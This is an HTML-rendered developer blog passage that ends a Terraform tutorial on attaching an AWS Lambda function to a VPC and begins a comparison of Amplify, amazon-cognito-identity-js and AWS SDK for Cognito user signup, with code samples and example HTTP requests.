<span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-default-network-acl"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong>Security Group</strong></p> <p>As with the default settings, it allows all outbound traffic and allows inbound traffic originating from the same VPC.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_default_security_group"</span> <span class="s2">"default_security_group"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="nx">-1</span> <span class="nx">self</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="p">}</span> <span class="nx">egress</span> <span class="p">{</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"-1"</span> <span class="nx">cidr_blocks</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"0.0.0.0/0"</span><span class="p">]</span> <span class="c1"># cidr_blocks = ["127.0.0.1/32"]</span> <span class="p">}</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-default-security-group"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h3> Add Lambda to the VPC </h3> <p>Now that we have the VPC set up we can associate our existing Lambda function with the network. For that, we need to provide the VPC subnet and security group. AWS recommends adding Lambda to at least 2 subnets for high availability. Combined with the recommendation to have multiple NAT gateways, you will need to create additional route tables too, to associate each private subnet with its dedicated NAT Gateway.</p> <p><strong>VPC access policy</strong></p> <p>Since Lambda service will need to create ENIs (virtual network cards) in the private subnet, it needs additional IAM permissions. Those can be granted via <code>AWSLambdaVPCAccessExecutionRole</code> managed policy. </p> <p>If the permission is missing, you will get the error during deployment: <em>Error: error modifying Lambda Function (lambda-vpc-tf-lambda-function) configuration : InvalidParameterValueException: The provided execution role does not have permissions to call CreateNetworkInterface on EC2</em>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy_attachment"</span> <span class="s2">"iam_role_policy_attachment_lambda_vpc_access_execution"</span> <span class="p">{</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">iam_role</span><span class="p">.</span><span class="nx">name</span> <span class="nx">policy_arn</span> <span class="p">=</span> <span class="s2">"arn:aws:iam::aws:policy/service-role/AWSLambdaVPCAccessExecutionRole"</span> <span class="p">}</span> </code></pre> </div> <p><strong>Lambda function VPC config</strong></p> <p>We configure Lambda to connect it to the private subnet. Also it will be subject to the Security Group rules.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_lambda_function"</span> <span class="s2">"lambda_function"</span> <span class="p">{</span> <span class="p">...</span> <span class="nx">vpc_config</span> <span class="p">{</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_private</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_default_security_group</span><span class="p">.</span><span class="nx">default_security_group</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>To confirm everything is configured correctly, invoke the function again. If you're getting "timed out" error in Cloudwatch, likely something is wrong with the NAT Gateway configuration as the function cannot reach the API.</p> <h2> References </h2> <ul> <li><a href="https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/lambda_function" rel="noopener noreferrer">https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/lambda_function</a></li> <li><a href="https://github.com/maximivanov/deploy-aws-lambda-to-vpc-with-terraform" rel="noopener noreferrer">https://github.com/maximivanov/deploy-aws-lambda-to-vpc-with-terraform</a></li> <li><a href="https://lumigo.io/aws-lambda-deployment/lambda-vpc/" rel="noopener noreferrer">https://lumigo.io/aws-lambda-deployment/lambda-vpc/</a></li> <li><a href="https://mikhail.io/serverless/coldstarts/aws/" rel="noopener noreferrer">https://mikhail.io/serverless/coldstarts/aws/</a></li> <li><a href="https://stackoverflow.com/a/22212017/2579733" rel="noopener noreferrer">https://stackoverflow.com/a/22212017/2579733</a></li> <li><a href="https://api.chucknorris.io/" rel="noopener noreferrer">https://api.chucknorris.io/</a></li> </ul> <h2> ... </h2> <p>VPC configuration may be tricky if you're not a seasoned network professional. As a final note, I recommend this <a href="https://stackoverflow.com/a/22212017/2579733" rel="noopener noreferrer">Stack Overflow answer</a> by Michael "sqlbot" which explains private/public subnet concepts really well.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i" rel="noopener noreferrer">follow me</a> on Twitter for the latest updates.</em></p> aws serverless terraform tutorial AWS Cognito: Amplify vs amazon-cognito-identity-js vs AWS SDK Max Ivanov Sun, 04 Apr 2021 01:11:36 +0000 https://forem.com/maxivanov/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk-2e3k https://forem.com/maxivanov/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk-2e3k <p>Imagine you're starting a new project. You want to leverage existing solutions and cloud infrastructure to move fast. Users should be able to create accounts in the application you're about to build, so you're thinking about a <strong>managed user directory</strong>. It has to be reliable, secure and scalable. Not something you can build yourself overnight! AWS Cognito is a great service that can help you push the burden to the service provider.</p> <p>After the first round of planning, you have a good idea of the architecture of the application, including what languages and frameworks will be used. Now you need to decide how you're going to <strong>integrate Cognito with your app</strong>. There's not one or two ways to do it, there are 3 official code libraries that you can use: </p> <ul> <li><a href="https://docs.amplify.aws/lib/auth/getting-started/q/platform/js">Amplify</a></li> <li><a href="https://github.com/aws-amplify/amplify-js/tree/main/packages/amazon-cognito-identity-js">amazon-cognito-identity-js</a></li> <li><a href="https://docs.aws.amazon.com/sdk-for-javascript/v3/developer-guide/welcome.html">AWS SDK</a></li> </ul> <p>Read on to see how these options compare, what are the limitations and when to use which.</p> <h2> Comparing options </h2> <p>How do you decide which library/package to use? It depends on a few factors:</p> <ul> <li>Are you going to use it in the <strong>frontend</strong> or in the <strong>backend</strong>?</li> <li>On the frontend, will you be using one of the popular <strong>frameworks</strong> (React/Next.js, Vue.js/Nuxt.js, Angular) or is it something custom / vanilla JS?</li> <li>Will you need to use <strong>secret-enabled</strong> app client in Cognito?</li> <li>Are you going to call Cognito APIs that require AWS developer <strong>credentials</strong>? E.g. <code>adminCreateUser</code> </li> </ul> <p>We will go through all the options describing their pros/cons. For each library I'll provide a short example of how to use it in the code, both in the frontend and backend. All examples below make an unathenticated <code>signUp</code> Cognito API call.<br> Additionally, you'll find examples of requests and responses (HTTP headers and bodies as well as data returned in the code). I feel like when you can see all of the details in one place it makes it easier to understand the API.</p> <p>All code examples use ES6 modules and are written with async/await for asynchronous calls. Callbacks are promisified where necessary. Requests are made against this Cognito User Pool which has 2 app clients: one is public (client secret disabled) and one is private (client secret enabled).</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--4p5n9DXP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/cognito-settings.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--4p5n9DXP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/cognito-settings.webp" alt="Cognito configuration"></a></p> <p>Full code examples can be found in the <a href="https://github.com/maximivanov/cognito-js-usage">post's repository</a>.</p> <h2> Amplify </h2> <p>Amplify is an umbrella project for a bunch of services, one of them is authentication (Cognito). </p> <ul> <li>Does Amplify work in the backend? It's a client library, and it's supposed to be used in the browser and mobile applications. Having said that it can work on the backend too, when used in the context of a SSR framework (Next.js/Nuxt.js). But outside of the universal rendering mode you're probably better off using the other 2 options.</li> <li>On the frontend, it integrates well with major frameworks. It has ready-made, customizeable UI components which make implementing auth-related flows a breeze.</li> <li>It doesn't support secret-enabled Cognito app clients. <em>"Generate client secret"</em> must be unchecked in the app client settings.</li> <li>You can use admin-level Cognito APIs, but only inderectly via <a href="https://docs.amplify.aws/cli/auth/admin">Admin Actions</a>. The way it works is you'd use Amplify to deploy an API Gateway and a Lambda that implements (essentially proxies) Cognito admin APIs. To limit access, you can restrict access to that Lambda to a specific Cognito group.</li> </ul> <p><strong>When to use Amplify:</strong> whenever you're building a client-side application and you need other tools from the Amplify ecosystem (APIs, analytics, storage, etc.). Also it can help you start quickly with premade UI components.</p> <h3> Use Amplify in browser </h3> <p>Here's a basic form that accepts an email and a password and creates a new user in Cognito:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eBhBJOyX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/amplify-browser.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eBhBJOyX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/amplify-browser.webp" alt="Amplify example"></a></p> <p>Corresponding JS code (Parcel-bundled):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="nx">Amplify</span><span class="p">,</span> <span class="p">{</span> <span class="nx">Auth</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">aws-amplify</span><span class="dl">'</span> <span class="nx">Amplify</span><span class="p">.</span><span class="nx">configure</span><span class="p">({</span> <span class="na">Auth</span><span class="p">:</span> <span class="p">{</span> <span class="na">region</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span><span class="p">,</span> <span class="na">userPoolId</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1_ZPwVcZizN</span><span class="dl">'</span><span class="p">,</span> <span class="na">userPoolWebClientId</span><span class="p">:</span> <span class="dl">'</span><span class="s1">658l7npr63jq5ohbk2gl2jvf6</span><span class="dl">'</span><span class="p">,</span> <span class="p">},</span> <span class="p">})</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">form</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.form</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.email</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">password</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.password</span><span class="dl">'</span><span class="p">)</span> <span class="nx">form</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">submit</span><span class="dl">'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">event</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">()</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">email</span><span class="p">.</span><span class="nx">value</span><span class="p">,</span> <span class="nx">password</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup success. Result: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup fail. Error: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">}</span> <span class="p">})</span> <span class="p">})()</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">Auth</span><span class="p">.</span><span class="nx">signUp</span><span class="p">({</span> <span class="na">username</span><span class="p">:</span> <span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="na">attributes</span><span class="p">:</span> <span class="p">{</span> <span class="nx">email</span><span class="p">,</span> <span class="p">},</span> <span class="p">})</span> <span class="p">}</span> </code></pre> </div> <p>On success, response will be as following (<code>res</code> variable in the code above):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"user"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"max@maxivanov.io"</span><span class="p">,</span><span class="w"> </span><span class="nl">"pool"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"userPoolId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1_ZPwVcZizN"</span><span class="p">,</span><span class="w"> </span><span class="nl">"clientId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"658l7npr63jq5ohbk2gl2jvf6"</span><span class="p">,</span><span class="w"> </span><span class="nl">"client"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"endpoint"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://cognito-idp.us-east-1.amazonaws.com/"</span><span class="p">,</span><span class="w"> </span><span class="nl">"fetchOptions"</span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"advancedSecurityDataCollectionFlag"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nl">"storage"</span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Session"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nl">"client"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"endpoint"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://cognito-idp.us-east-1.amazonaws.com/"</span><span class="p">,</span><span class="w"> </span><span class="nl">"fetchOptions"</span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"signInUserSession"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nl">"authenticationFlowType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"USER_SRP_AUTH"</span><span class="p">,</span><span class="w"> </span><span class="nl">"storage"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w"> </span><span class="nl">"keyPrefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"CognitoIdentityServiceProvider.658l7npr63jq5ohbk2gl2jvf6"</span><span class="p">,</span><span class="w"> </span><span class="nl">"userDataKey"</span><span class="p">:</span><span class="w"> </span><span class="s2">"CognitoIdentityServiceProvider.658l7npr63jq5ohbk2gl2jvf6.max@maxivanov.io.userData"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"userConfirmed"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"userSub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"68afb047-37d1-4efc-bc11-26056d1657c8"</span><span class="p">,</span><span class="w"> </span><span class="nl">"codeDeliveryDetails"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AttributeName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"DeliveryMedium"</span><span class="p">:</span><span class="w"> </span><span class="s2">"EMAIL"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Destination"</span><span class="p">:</span><span class="w"> </span><span class="s2">"m***@m***.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Amplify HTTP request and response headers:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1W4JANww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/amplify-http-request.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1W4JANww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/04/aws-cognito-amplify-vs-amazon-cognito-identity-js-vs-aws-sdk/amplify-http-request.webp" alt="Amplify http request and response"></a></p> <p>HTTP request body:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"ClientId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"658l7npr63jq5ohbk2gl2jvf6"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"max@maxivanov.io"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Password"</span><span class="p">:</span><span class="w"> </span><span class="s2">"12345678"</span><span class="p">,</span><span class="w"> </span><span class="nl">"UserAttributes"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Value"</span><span class="p">:</span><span class="w"> </span><span class="s2">"max@maxivanov.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"ValidationData"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>HTTP response body:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"CodeDeliveryDetails"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AttributeName"</span><span class="p">:</span><span class="w"> </span><span class="s2">"email"</span><span class="p">,</span><span class="w"> </span><span class="nl">"DeliveryMedium"</span><span class="p">:</span><span class="w"> </span><span class="s2">"EMAIL"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Destination"</span><span class="p">:</span><span class="w"> </span><span class="s2">"m***@m***.io"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"UserConfirmed"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"UserSub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"341eeb82-bcf8-4453-aac3-a0f323a7b7dc"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> amazon-cognito-identity-js </h2> <p>It used to be a standalone library but eventually it migrated to the Amplify project. It is now hosted as a package in the Amplify monorepo. In fact Amplify uses this package to make Cognito API requests. But you can use it without Amplify just fine. It is essentially a nice wrapper around lower-level AWS SDK (note it does not use <code>aws-sdk</code> package, it makes HTTP calls to AWS directly).</p> <ul> <li>Does it work in the backend? Yes, it can work in the Node.js environment.</li> <li>When used on the frontend, it provides lower level (compared to Amplify) API to make Cognito calls. It won't help with UI scaffolding, it only facilitates communication with the server.</li> <li>It doesn't support secret-enabled Cognito app clients. <em>"Generate client secret"</em> must be unchecked in the app client settings.</li> <li>You cannot use admin-level Cognito APIs (those that require AWS credentials) with <code>amazon-cognito-identity-js</code>.</li> </ul> <p><strong>When to use <code>amazon-cognito-identity-js</code>:</strong> when you do not need any of the extra features provided by Amplify and you only need to integrate Cognito within your app's custom UI. As a bonus you will probably get a much smaller bundle. You can also use it in the backend but you'd be limited to public Cognito APIs only.</p> <h3> Use amazon-cognito-identity-js in browser </h3> <p>It's the same basic signup form as in the Amplify example.</p> <p>Corresponding JS code (Parcel-bundled):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">CognitoUserPool</span><span class="p">,</span> <span class="nx">CognitoUserAttribute</span><span class="p">,</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">amazon-cognito-identity-js</span><span class="dl">'</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">promisify</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">util</span><span class="dl">'</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">form</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.form</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.email</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">password</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="dl">'</span><span class="s1">.password</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">userPool</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoUserPool</span><span class="p">({</span> <span class="na">UserPoolId</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1_ZPwVcZizN</span><span class="dl">'</span><span class="p">,</span> <span class="na">ClientId</span><span class="p">:</span> <span class="dl">'</span><span class="s1">658l7npr63jq5ohbk2gl2jvf6</span><span class="dl">'</span><span class="p">,</span> <span class="p">})</span> <span class="nx">form</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">submit</span><span class="dl">'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">event</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">()</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">userPool</span><span class="p">,</span> <span class="nx">email</span><span class="p">.</span><span class="nx">value</span><span class="p">,</span> <span class="nx">password</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup success. Result: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup fail. Error: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">}</span> <span class="p">})</span> <span class="p">})()</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">userPool</span><span class="p">,</span> <span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">emailAttribute</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoUserAttribute</span><span class="p">({</span> <span class="na">Name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">email</span><span class="dl">'</span><span class="p">,</span> <span class="na">Value</span><span class="p">:</span> <span class="nx">email</span><span class="p">,</span> <span class="p">})</span> <span class="kd">let</span> <span class="nx">attributes</span> <span class="o">=</span> <span class="p">[</span><span class="nx">emailAttribute</span><span class="p">]</span> <span class="kd">const</span> <span class="nx">promisifiedSignUp</span> <span class="o">=</span> <span class="nx">promisify</span><span class="p">(</span><span class="nx">userPool</span><span class="p">.</span><span class="nx">signUp</span><span class="p">).</span><span class="nx">bind</span><span class="p">(</span><span class="nx">userPool</span><span class="p">)</span> <span class="k">return</span> <span class="nx">promisifiedSignUp</span><span class="p">(</span><span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">attributes</span><span class="p">,</span> <span class="kc">null</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>Result returned by the <code>userPool.signUp</code> as well as HTTP request/response headers and bodies will be the same as in the Amplify example above.</p> <h3> Use amazon-cognito-identity-js on the server </h3> <p>Again, the script will make a call to the signUp Cognito API. The code uses ES6 modules so Node.js 14+ is required.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">CognitoUserPool</span><span class="p">,</span> <span class="nx">CognitoUserAttribute</span><span class="p">,</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">amazon-cognito-identity-js</span><span class="dl">'</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">promisify</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">util</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">userPoolId</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">us-east-1_ZPwVcZizN</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">clientId</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">658l7npr63jq5ohbk2gl2jvf6</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">max@maxivanov.io</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">password</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">12345678</span><span class="dl">'</span> <span class="p">;(</span><span class="k">async</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">userPool</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoUserPool</span><span class="p">({</span> <span class="na">UserPoolId</span><span class="p">:</span> <span class="nx">userPoolId</span><span class="p">,</span> <span class="na">ClientId</span><span class="p">:</span> <span class="nx">clientId</span><span class="p">,</span> <span class="p">})</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">userPool</span><span class="p">,</span> <span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">)</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup success. Result: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Signup fail. Error: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">}</span> <span class="p">})()</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">signUp</span><span class="p">(</span><span class="nx">userPool</span><span class="p">,</span> <span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">emailAttribute</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">CognitoUserAttribute</span><span class="p">({</span> <span class="na">Name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">email</span><span class="dl">'</span><span class="p">,</span> <span class="na">Value</span><span class="p">:</span> <span class="nx">email</span><span class="p">,</span> <span class="p">})</span> <span class="kd">let</span> <span class="nx">attributes</span> <span class="o">=</span> <span class="p">[</span><span class="nx">emailAttribute</span><span class="p">]</span> <span class="kd">const</span> <span class="nx">promisifiedSignUp</span> <span class="o">=</span> <span class="nx">promisify</span><span class="p">(</span><span class="nx">userPool</span><span class="p">.</span><span class="nx">signUp</span><span class="p">).</span><span class="nx">bind</span><span class="p">(</span><span class="nx">userPool</span><span class="p">)</span> <span class="k">return</span> <span class="nx">promisifiedSignUp</span><span class="p">(</span><span class="nx">email</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">attributes</span><span class="p">,</span> <span class="kc">null</span><span class="p">)</span> <span class="p">}</span> 